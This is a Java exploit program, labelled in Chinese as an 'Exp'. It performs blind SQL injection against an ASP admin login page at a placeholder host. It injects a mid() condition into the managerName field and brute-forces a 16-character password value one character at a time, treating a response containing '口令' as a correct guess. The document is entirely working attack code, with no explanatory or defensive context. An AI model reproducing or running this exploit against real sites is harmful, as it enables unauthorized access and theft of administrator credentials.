Java写的Exp:
package kk;
import java.io.*;
import java.net.*;
public class PostResquest {
private String[] key={"1","2","3","4","5","6","7","8","9","0","a","b","c","d","e","f","g","h","i","j","k","l","m","n","o","p","q","r","s","t","u","v","w","x","z","y"};
public PostResquest() {
String urlStr="http://www.xxxxx.com/system/chklogin.asp";
String value = "managerName=asdads'or%20mid(F_PassWord,Num,1)='Str&tpassWord=123456&surl=&submit.x=0&submit.y=0";
String tempValue;
String tempValue2;
OutputStreamWriter oswPost;
BufferedReader brPost;
try {
URL url=new URL(urlStr);
StringBuffer temp;
HttpURLConnection conn;
for(int k=1;k<=16;k++){
tempValue=value.replaceAll("Num",String.valueOf(k));
for(int i=0;i<key.length;i++){
conn= (HttpURLConnection)url.openConnection();
conn.setDoOutput(true);
tempValue2=tempValue.replaceAll("Str", key[i]);
oswPost=new OutputStreamWriter(conn.getOutputStream());
oswPost.write(tempValue2);
oswPost.flush();
oswPost.close();
brPost=new BufferedReader(new InputStreamReader(conn.getInputStream()));
String line=null;
temp=new StringBuffer();
while((line=brPost.readLine())!=null)
{
line=new String(line.getBytes(),"gb2312");
temp.append(line+"\r\n");
}
if(temp.indexOf("口令")>-1){
System.out.print(key[i]);
break;
}
if(i==key.length-1){
System.out.println("出错了");
return;
}
}
}
} catch (MalformedURLException e) {
e.printStackTrace();
} catch (IOException e) {
e.printStackTrace();
}
}
public static void main(String[] args) {
new PostResquest();
}
} |